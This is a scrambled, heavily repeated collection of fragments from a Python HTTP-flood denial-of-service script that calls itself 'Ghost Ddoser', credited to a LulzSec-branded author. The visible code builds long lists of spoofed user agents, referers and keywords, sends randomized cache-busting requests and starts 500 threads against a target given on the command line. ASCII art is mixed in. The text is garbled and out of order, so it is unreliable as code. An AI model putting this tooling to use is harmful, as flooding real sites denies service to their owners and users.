<EMAIL>') headers_useragents.append('amaya/x.xx", "headers_useragents.append('Mozilla/4.0 
(PDA; Windows CE/0.9.3) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0)", "~~~ ~~~ ~~~ \"\"\" #http request def httpcall(url): useragent_list() referer_list() code=0 if url.count(\"?\")>0:", "like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)", "3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0", "http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered", "(Linux; Android 4.2.1; Galaxy Nexus Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Mobile Safari/535.19')", "2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46') headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)')", "Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like", "keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus", "NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') 
headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1;", "NT 5.2; U; ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good", "Android 4.1.1; en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30')", "| | `| : `' ,' `. / |`-:_ ; | | |", "Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT", "Android 4.1.1; Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux;", "http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/)", "MSIE 4.01;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows CE; PPC;", "headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x Build xxxxx')", "('http://' + host + '/') return(headers_referers) def bots(): global bots bots=[] bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\")", "`. / |`-:_ ; | | | : \\ `--. 
) /|-._: :", "Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0", "Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.2.1; Nexus 10 Build/JOP40D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like", "Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy Bird')", "Nexus 7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2;", "def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=')", "headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)') headers_useragents.append('ask.24x.info') headers_useragents.append('AskAboutOil/0.06-rcp", "Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824", "Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') 
headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('Mozilla/5.0", "a user agent array def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT", "Lulz ,'/ ;|/..--'' \\ Boat ,'_/.-/': : _..-'''/ / | \\ \\ _|/|", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')", "\\; \\ \\,;' \\ ,\\ / \\: `:\\ \\ // `:`. ,' \\", "U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile", "for i in range(0, size): a = random.randint(65, 90) out_str += chr(a) return(out_str)", "4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0", "_// ~ ~ / / / / / / / / ~ ~~", "; ; : `. 
// // // // ,' / ~~~`.______//____//____//____//_______,'~ // //~", "NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1;", "MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2;", "Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36')", "url = sys.argv[1] if url.count(\"/\")==2: url = url + \"/\" m = re.search('http\\://([^/]*)/?.*',", "SH901iC(c100;TB;W24H12)') headers_useragents.append('DoCoMo/1.0/N503is/c10') headers_useragents.append('KDDI-KC31 UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0')", "3.5.30729)') headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1;", "librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3')", "range(0, size): a = random.randint(65, 90) out_str += chr(a) return(out_str) def usage(): print", "bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") 
bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\")", "Gecko) Version/4.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like", "(Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux;", "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like", "IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR", "OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3;", "da LulzSec Ghost' print \"\\a\" print \\ \"\"\" . 
_____|\\ _.--| LOL |:", "U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;') headers_useragents.append('VS840", "bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") return(bots) #builds random", "'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try: urllib2.urlopen(request) except", "headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') 
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=')", "// ~~ _// _// _// ~ _// ~ ~ / / / /", "Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR", "Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36')", "Finish\" #execute if len(sys.argv) < 2: usage() sys.exit() else: if sys.argv[1]==\"help\": usage() sys.exit()", "2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet Browser 3.x') headers_useragents.append('BaiduImagespider+(+http://www.baidu.jp/search/s308.html)') headers_useragents.append('BaiDuSpider') headers_useragents.append('Baiduspider+(+http://help.baidu.jp/system/05.html)')", "~~~ ~~~ \"\"\" #http request def httpcall(url): useragent_list() referer_list() code=0 if url.count(\"?\")>0: param_joiner=\"&\"", "Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3)", "Mac OS X 10_6_2; en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac", "Ghost Ddoser By V3I0p3r' print 'Script Priv8 Privada da LulzSec Ghost' print \"\\a\"", "CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64;", "headers_useragents.append('Windows CE; PPC; 240x320)') 
headers_useragents.append('Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020')", "Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append(' Mozilla/5.0 (Linux; Android", "'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10))) request.add_header('Keep-Alive', random.randint(110,120)) request.add_header('Connection', 'keep-alive') request.add_header('Host',host) try:", "ZipCommander (Net) - http://www.zipcommander.com/') headers_useragents.append('2Bone_LinkChecker/1.0 libwww-perl/5.64') headers_useragents.append('4anything.com LinkChecker v2.0') headers_useragents.append('8484 Boston Project v", "(Linux; U; Android 4.1.1; en-us; Nexus S Build/JRO03E)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0", "G3') keyword_top.append('Xbox One') keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach')", "intelligence search engine China)') headers_useragents.append('AideRSS/1.0 (aiderss.com)') headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev;", "2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js')", "Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') 
headers_useragents.append('Mozilla/5.0", "robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)')", "x64; Trident/4.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR", "iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)')", "en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux;", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=')", "(http://www.avantbrowser.com)') headers_useragents.append('AESOP_com_SpiderMan') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko)", "\\ _|/| \\ /-./_ \\; \\ \\,;' \\ ,\\ / \\: `:\\ \\", "MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') 
headers_useragents.append('Opera/9.80", "en-ca)') headers_useragents.append('iTunes/9.0.3') headers_useragents.append('iTunes/9.0.2 (Windows; N)') headers_useragents.append('itunes/9.0.2 (Macintosh; Intel Mac OS X 10.4.11)') headers_useragents.append('Mozilla/5.0", "headers_useragents.append('Amiga-AWeb/3.4.167SE') headers_useragents.append('AmigaVoyager/3.4.4 (MorphOS/PPC native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille", "10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo 3.2)') headers_useragents.append('", "Boston Project v 1.0') headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html )') headers_useragents.append('A-Online", "Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot", "UP.Browser/6.2.0.5 (GUI)') headers_useragents.append('MMP/2.0') headers_useragents.append('UP.Browser/3.04-TS14 UP.Link/3.4.4') headers_useragents.append('Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1') headers_useragents.append('J-PHONE/5.0/V801SA/SN123456789012345 SA/0001JP Profile/MIDP-1.0') headers_useragents.append('Mozilla/3.0(DDIPOCKET;JRC/AH-J3001V,AH-J3002V/1.0/0100/c50)CNF/2.0') headers_useragents.append('PDXGW/1.0') headers_useragents.append('ASTEL/1.0/J-0511.00/c10/smel')", "rv 1.8.1.5pre) Gecko/20070619') headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016')", "Airlines Flight 370') keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') 
keyword_top.append('ISIS') keyword_top.append('Frozen')", "host = m.group(1) for i in range(500): t = HTTPThread() t.start() t =", "CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows", "headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot", "headers_useragents.append('Aplix HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4", "keyword_top.append('Samsung Galaxy S5') keyword_top.append('Nexus 6') keyword_top.append('Moto G') keyword_top.append('Samsung Note 4') keyword_top.append('LG G3') keyword_top.append('Xbox", "pass # monitors http threads and counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter", "headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') # generates a Keyword list def keyword_list(): global", "NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0", 
"headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot;", "7 Build/JRO03D)') headers_useragents.append('AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.2; GT-I9300", "keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus')", "NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3;", "headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1;", "Intranet V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista", "buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) request.add_header('User-Agent', random.choice(headers_useragents)) request.add_header('Cache-Control', 'no-cache') request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') request.add_header('Referer', random.choice(headers_referers)", "keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket') keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' +", ",. . ,' :: /`-._| | | || ' : `.`.) 
_,' |;._::", "headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech", "Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT", "Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx]", "(Windows; Mobile Content Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0", "Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like", "generates a referer array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=')", "Android 4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android;", "__..--'; : : / ( ;|;-./_ _/.-:'o | / ' | / ,", "Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.3.6; en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like", "| : / `'-'--'----'---------' | | : O ._O O_. 
O ._O O_.", "V2.0 Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 evreka.com <EMAIL>') headers_useragents.append('AltaVista V2.0B <EMAIL>')", "Android 4.1.2; en-au; GT-N5100 Build/JZO54K)') headers_useragents.append('CSSCheck/1.2.2') headers_useragents.append('Cynthia 1.0') headers_useragents.append('HTMLParser/1.6') headers_useragents.append('P3P Validator') headers_useragents.append('W3C_Validator/1.654') headers_useragents.append('W3C_Validator/1.606')", "Mozilla/5.0 (compatible; AvantGo 3.2;') headers_useragents.append('ProxiNet; Danger hiptop 1.0)') headers_useragents.append('DoCoMo/1.0/P502i/c10 (Google CHTML Proxy/1.0)') headers_useragents.append('DoCoMo/2.0", "headers_useragents.append('Mozilla/4.0 (compatible; MSIE 4.01;') headers_useragents.append('Windows CE; PPC; 240x320)') headers_useragents.append('Mozilla/2.0 (compatible; MSIE 3.02;') headers_useragents.append('Windows", "7.0; Windows NT 6.0; en-US)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') headers_useragents.append('Opera/9.80 (Windows", "size): a = random.randint(65, 90) out_str += chr(a) return(out_str) def usage(): print 'Pra", "4.2.1; Nexus 7 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Chrome/18.0.1025.166 Safari/535.19') headers_useragents.append('Mozilla/5.0 (Android; Mobile;", "1.52) AppleWebKit/536.26 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2')", "Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko)", "(+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja 
Hybridsuchmaschine (Germany)')", "Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android", "keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi')", "(X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.1;", "/ / ~ ~~ ~~~ ~~~ ~~~ ~~~ \"\"\" #http request def httpcall(url):", "spider 0.1 alpha - http://www.annomille.it') headers_useragents.append('annotate_google; http://ponderer.org/download/annotate_google.user.js') headers_useragents.append('Anonymized by ProxyOS: http://www.megaproxy.com') headers_useragents.append('Anonymizer/1.1') 